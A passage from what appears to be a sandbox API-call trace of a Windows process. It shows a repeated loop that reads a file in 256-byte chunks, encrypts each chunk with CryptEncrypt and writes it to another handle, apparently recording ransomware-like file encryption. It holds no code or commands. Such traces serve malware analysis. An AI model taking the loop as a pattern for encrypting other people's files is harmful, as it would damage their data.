nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.429] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.429] GetLastError () returned 0x0 [0161.429] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.429] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.429] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.429] GetLastError () returned 0x0 [0161.430] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.430] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.430] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.430] GetLastError () returned 0x0 [0161.430] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.430] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.430] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.430] GetLastError () returned 0x0 [0161.430] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.430] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.430] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.430] GetLastError () returned 0x0 [0161.430] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.430] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.430] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.430] GetLastError () returned 0x0 [0161.430] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.430] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.430] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.431] GetLastError () returned 0x0 [0161.431] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.431] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.431] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.431] GetLastError () returned 0x0 [0161.431] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.431] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.431] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.431] GetLastError () returned 0x0 [0161.431] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.431] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.431] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.431] GetLastError () returned 0x0 [0161.431] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.431] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.431] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.431] GetLastError () returned 0x0 [0161.431] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.431] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.432] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.432] GetLastError () returned 0x0 [0161.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.432] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.432] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.432] GetLastError () returned 0x0 [0161.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.432] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.432] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.432] GetLastError () returned 0x0 [0161.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.432] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.432] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.432] GetLastError () returned 0x0 [0161.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.432] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.432] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.432] GetLastError () returned 0x0 [0161.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.433] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.433] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.433] GetLastError () returned 0x0 [0161.433] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.433] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.433] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.433] GetLastError () returned 0x0 [0161.433] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.433] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.433] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.433] GetLastError () returned 0x0 [0161.433] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.433] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.433] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.433] GetLastError () returned 0x0 [0161.433] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.433] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.433] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.434] GetLastError () returned 0x0 [0161.434] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.434] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.434] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.434] GetLastError () returned 0x0 [0161.434] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.434] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.434] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.434] GetLastError () returned 0x0 [0161.434] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.434] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.434] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.434] GetLastError () returned 0x0 [0161.434] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.434] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.434] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.434] GetLastError () returned 0x0 [0161.434] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.434] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.435] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.435] GetLastError () returned 0x0 [0161.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.435] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.435] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.435] GetLastError () returned 0x0 [0161.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.435] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.435] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.435] GetLastError () returned 0x0 [0161.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.435] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.435] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.435] GetLastError () returned 0x0 [0161.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.435] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.435] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.435] GetLastError () returned 0x0 [0161.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.435] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.436] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.436] GetLastError () returned 0x0 [0161.436] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.436] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.436] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.436] GetLastError () returned 0x0 [0161.436] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.436] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: 